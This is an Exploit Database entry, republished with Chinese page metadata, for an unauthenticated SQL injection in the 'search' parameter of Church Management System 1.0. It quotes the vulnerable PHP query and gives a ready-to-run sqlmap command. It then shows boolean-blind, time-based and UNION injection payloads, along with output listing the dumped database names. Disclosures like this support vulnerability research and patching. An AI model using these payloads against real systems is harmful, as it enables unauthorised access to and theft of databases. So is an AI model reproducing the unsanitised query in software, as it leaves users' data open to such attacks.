Church Management System 1.0 – ‘search’ SQL Injection (Unauthenticated)

• Exploit Database
• 115 阅读

• 作者： Erwin Krazek
  日期： 2021-09-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50303/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44

  # Exploit Title: Church Management System 1.0 - &apos;search&apos; SQL Injection (Unauthenticated) # Exploit Author: Erwin Krazek (Nero) # Date: 17/09/2021 # Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip # Vendor: oretnom23 # Version: v1.0 # Tested on: Linux, Apache, Mysql # Exploit Description: Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in &apos;search&apos; parameter allowing remote attackers to dump the SQL database using SQL Injection attack.   # Vulnerable Code In search.php on line 28 $count_all = $conn->query("SELECT b.*,concat(u.firstname,&apos; &apos;,u.lastname) as author FROM <code>blogs</code> b inner join <code>users</code> u on b.author_id = u.id where b.<code>status</code> =1 and (b.<code>title</code> LIKE &apos;%{$_GET[&apos;search&apos;]}%&apos; OR b.<code>meta_description</code> LIKE &apos;%{$_GET[&apos;search&apos;]}%&apos; OR b.<code>keywords</code> LIKE &apos;%{$_GET[&apos;search&apos;]}%&apos; OR b.<code>content</code> LIKE &apos;%{$_GET[&apos;search&apos;]}%&apos; )")->num_rows;   Sqlmap command: sqlmap -u &apos;http://localhost/church_management/?p=search&search=abcsw&apos; -p search --level=5 --risk=3 --dbs --random-agent --eta --batch   Output: --- Parameter: search (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: p=search&search=abcsw&apos;) OR NOT 4306=4306-- rFTu   Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=search&search=abcsw&apos;) AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac   Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: p=search&search=abcsw&apos;) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- - --- [17:33:38] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.46, PHP back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [17:33:38] [INFO] fetching database names available databases [4]: [*] church_db [*] information_schema [*] mysql [*] performance_schema